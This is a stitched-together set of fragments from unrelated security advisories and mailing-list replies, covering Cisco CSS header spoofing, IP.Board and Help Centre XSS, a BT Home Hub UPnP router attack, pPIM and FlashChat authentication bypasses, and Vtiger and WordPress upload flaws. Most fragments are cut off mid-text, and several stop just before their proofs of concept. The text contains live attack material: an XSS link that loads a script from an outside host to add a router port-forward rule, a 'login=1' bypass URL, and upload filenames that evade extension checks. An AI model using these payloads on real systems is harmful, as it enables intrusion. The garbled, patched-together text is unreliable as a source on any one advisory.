
VSR Advisory: Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities

However, there is no attempt by the CSS to prevent clients from
supplying their own ClientCert-* headers.  Depending on how application
developers handle multiple copies of these headers, an attacker may be
able to impersonate other users.

For example, assuming that a back-end web application simply trusts
the user identity supplied by the CSS in the ClientCert-Subject-CN
header and userX wants to impersonate userY, he may simply insert
the following HTTP header(s) in the HTTP request issued to the
server:


IPB v2.x up to 3.0.4 XSS vulnerability

files attachments. An attacker has to convince a user to view the
malicious file in order to run the evil code.

The only browser found affected is Internet Explorer +5.0; other
browsers (FF/Chrome/Opera..) seem to handle the issue correctly (or
simply blindly?)

IP.Board v2.x sets the MIME-type of *.txt files to
(application/x-dirview). If the *.txt file contains JavaScript/HTML it
will simply be parsed on IE +5.


Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

<script defer>code</script>

The defer property is an IE-ism which solves the problem, documented by
Microsoft here http://msdn.microsoft.com/en-us/library/ms533719%28VS.85%29.aspx.
Now that we are armed with knowledge of this trick, because these help
documents are in a privileged zone, we can simply execute commands.

You can test this with a command like so (assuming a recent IE):

C:\> ver
Microsoft Windows XP [Version 5.1.2600]


BT Home Flub: Pwnin the BT Home Hub (5) - exploiting IGDs remotely via UPnP

gateway is a BT Home Hub, clicking on the following link should add a
new forward rule called EVILFORWARDRULE: ATTACK
<http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src='http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss'%3e%3c/script%3e%3ca%20b=>

In order to check if the port-forwarding rule was added successfully
you can use UPnP Port Forwarding Utility [5] and simply click on
"Update list now" after the device has been discovered (device name
should show on the top-left corner a few seconds later after launching
the tool). You could of course use the technique and code explained in
this post on any Internet gateway that supports UPnP and is
vulnerable to a preauth XSS vulnerability. If you manage to

Hacking The Interwebs

silently execute in the background. At that moment the attacker will
have control over their router, pretty much regardless of its model.
Many of the home routers are vulnerable to this attack as many of them
support UPnP to one degree or another.

The attack does not rely on any bugs. Simply put, when two completely
legitimate technologies, Flash and UPnP, are combined together, they
compose a vulnerability, which exposes many home networks to a great
risk. The attack depends on the fact that most, if not all, routers
are UPnP enabled. The UPnP SOAP service can be accessed without
authorization over the default Web Admin Interface. With the help of

pPIM Multiple Vulnerabilities

Because the authentication takes place in templates/header.html in an
embedded piece of PHP code, depending on server configuration, this code
might not be executed.  Unless the web server is specifically configured
to execute PHP embedded in HTML files server side, the PHP code will
instead simply be passed back to clients as actual HTML.

Authentication bypass is possible by simply appending the GET variable
'login=1' to the URL.  For example, to access the Calendar page, calling
the URL 'http://target.tld/ppim/calendar.php' will redirect the
unauthenticated user to the login page.  However, calling the URL

[BuHa-Security] Winamp 5.35 (Infinite) M3U File Inclusion DoS Vulnerability

o Denial Of Service:
===================

The M3U file format allows including local and remote files by
simply specifying the path to the desired file. Furthermore, Winamp does
not check if the M3U file to include is the currently processed M3U
file, wherefore it's possible to force Winamp to recursively read a
certain M3U file. Winamp allocates memory on each iteration, which
leads to a stack overflow exception (0xc00000fd).




CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability

variants of an unrelated MS Excel vulnerability in BIFF file formats
reported in CORE-2009-0827 as not relevant to security because it can
only be triggered to cause a copy operation from memory locations above
3GB which would terminate the application without any possibility for
exploitation. The assumption that accesses to memory addresses above 3GB
will simply terminate the process is no longer valid in the context of
the Virtual PC hypervisor bug and thus this may outline another scenario
for exploitation of bugs that may have been deemed unexploitable before
and for which it is probable that fixes have not been developed.

. 2009-11-12:

RE: All China, All The Time

>    If so, the cost of security by blocking may be unjustifiable.

Absolutely - If possible, please read the article at:
http://www.securityfocus.com/infocus/1900/1

It's dated, but the concepts hold true.  The entire implementation is based on research and analysis, and of course, business applicability.  To be sure, I receive significant US-based attack traffic, but I can't block that for business reasons.  Unfortunately, many people see "block China" and immediately say "oh, that's unrealistic and ineffective."  This is not an Internet-based suggestion - it is simply a toolset one may use to implement country-by-country, protocol-by-protocol based access policy.  It's the same thing we do now from a protocol standpoint, but this simply allows one to aggregate data by geographic location.  I have no business need for traffic to/from China and many other countries (which I also block) so even in the absence of hard attack traffic, "least privilege" dictates that it is valid to disallow traffic from sources that are not needed.


> 
> 2. Urgency
> 

WordPress 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution

WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, 
and  usability. WordPress is both free and priceless at the same time. More simply, WordPress is
what you use when you want to work with your blogging software, not fight it.

III. DESCRIPTION
-------------------------


pam_captcha username harvest vulnerability

A site with a screen shot:
http://www.michaelboman.org/how-to/securing-ssh-access-with-pam-captcha

I found a security problem with the pam_captcha. If you enter a username 
that is not a valid user followed by the correct CAPTCHA, you do not get 
prompted for a password. You simply get prompted for another CAPTCHA. 
However, if you enter a username that is a valid user followed by the 
correct CAPTCHA, you will get prompted for a password. This means an 
attacker, or a script/bot could easily harvest a list of valid usernames 
simply by whether or not it prompts for a password after a valid captcha 
entry. I have duplicated this behavior in FreeBSD 8.0 which uses BSD's 


RE: All China, All The Time

If you can parse out XML, I'm sure you can script up something to "build" sets for IPTables.  However, I don't know that IPTables has the ability to "group" the individual IP ranges into "sets" as opposed to simply putting them in as line-by-line rules.

That's the beauty of ISA/TMG/UAG - the xml files build individual sets comprised of IP ranges which you can apply by themselves to whatever protocols you want to/from whatever network sources you want.  But, regardless of the chosen platform, at least you can parse out the XML to get what you want.
The important fields are:
  <fpc4:IPFrom dt:dt="string">66.227.2.137</fpc4:IPFrom> 
  <fpc4:IPTo dt:dt="string">66.227.2.144</fpc4:IPTo> 
  <fpc4:Name dt:dt="string">AL1122173577-1122173584</fpc4:Name>

Where IPFrom is the beginning IP of the range, IPTo is the ending IP of the range, and "Name" is a unique name for the range itself.  I chose to have the name simply be the country code followed by the range so it could be immediately identified even if used outside of a set.


[MajorSecurity Advisory #59]PHP <=5.3 - mysqli_real_escape_string() full path disclosure

gather the real path of the server side script.

The mysqli_real_escape_string() PHP function takes strings as parameters
and will raise warnings when values that are passed are arrays rather
than strings.
To get the path of the current script, you simply need to pass the
arguments as arrays rather than the expected strings
and then simply read the warning message generated by PHP to see the
error including the full path of the current running script.

Proof of concept:

[MajorSecurity Advisory #57]PHP <=5.3 - preg_match() full path disclosure

preg_match() PHP function which allows attackers to
gather the real path of the server side script.

The preg_match() PHP function takes strings as parameters and will raise
warnings when values that are passed are arrays rather than strings.
To get the path of the current script, you simply need to pass the
arguments as arrays rather than the expected strings
and then simply read the warning message generated by PHP to see the
error including the full path of the current running script.

Proof of concept:

Vtiger CRM 5.0.4 Multiple Vulnerabilities

For example, on Windows OS it is possible to exploit this vulnerability by
requesting an upload with the filename "foo.php.".

This string will bypass the check and since Windows does not permit
filenames ending with a dot, modifying it in a transparent way, the final
name of the file will simply be "foo.php.".

A similar result can be obtained on GNU/Linux by requesting an upload
with the filename "foo.php/."

Note that the integrated webmail feature that allows a user to write

CORE-2009-0108: Multiple vulnerabilities in Sun Calendar Express Web Server

3. *Vulnerability Description*

Several vulnerabilities have been discovered in Sun Java System Calendar
Express web server [1]. First, an attacker can crash the web server,
creating a Denial of Service condition, by simply requesting a certain URL
twice. Second, several Cross-site scripting vulnerabilities [2], [3]
were found in the following files/urls:

   1. 'https://<server>:3443/login.wcap'
   2. 'https://<server>:3443/command.shtml'

FastStone Image Viewer v3.6 (malformed bmp image) DoS Exploit

            Katharsis, all from #dark-coders and others;]

PoC:

#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# FastStone Image Viewer v3.6 simply crashes
# Tested on Windows 2000 SP4
#-----INFO----------------------
#EAX 00002847
#ECX 00000000

flashchat severe bug

                                        ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||
                                        ($req['s'] == 7) <-- *bypass line*
                                  )


This piece of code allows a normal user to bypass role filtering and to be granted the admin role as a normal user. To exploit the vulnerability, simply send to getxml.php, while in the chat, this POST data string (for example by intercepting and modifying a legal message packet sent to the server with the Tamper Data plugin of Firefox):

For example, to ban a user simply add the bypass to the normal ban string request:

replace:
//normal message sent to server that has been intercepted

RE: Windows Vista Power Management & Local Security Policy

this is a security vulnerability in a traditional sense. I completely agree
with you. Think about it this way... When you press the power button on the
machine and it performs a graceful shutdown, stuff happens inside of the
operating system. That stuff happens at an elevated privilege level. If
there were some way to hook into the stuff that happens, you (as an
unauthenticated user), could do bad things (besides simply shutting down the
system) using that hook simply by pressing the power button at the logon
screen. For example, if Jim wants to know what Nancy is working on, he could
write a program which e-mails him the contents of her "My Documents" folder
that is triggered by a hook into that process. All Jim needs to do is get
Nancy to run that program on her system (not hard) and walk by her office


Summer Camp 2008 - La Garrotxa

I am pleased to announce that the 1st Edition of Summer Camp 2008 will
be held on 4, 5 and 6 of July in Spain and you are all invited to come
to this event.

This invitation is for anyone interested in security, technology, or
who simply wants to learn, to teach, to meet with old or new friends
and/or participate in this event.

You can get more detailed information in our website:

        http://associacio-aoe.org/scg/

Multiple vulnerabilities in WinCom LPD Total 3.0.2.623

local and remote admins for managing the wincomlpd server.

The problem here is very simple: the authentication method used by
the program is practically nonexistent.
In short, an attacker can manage the wincomlpd server without knowing
the admin username and password by simply skipping the auth stage.

This bug can be exploited in at least two ways: writing an alternative
client (the protocol is simple enough so it's not a problem) or just
modifying the admin client program (LPDAdmin.exe).


Multiple vulnerabilities in BarracudaDrive 3.7.2

-------------------------------
B] scripts source visualization
-------------------------------

All the custom scripts in the server (like the LUA scripts with lsp
extension) can be visualized entirely instead of being executed simply by
using a '+', a dot or any other char greater than 0x7f after the script's
name.

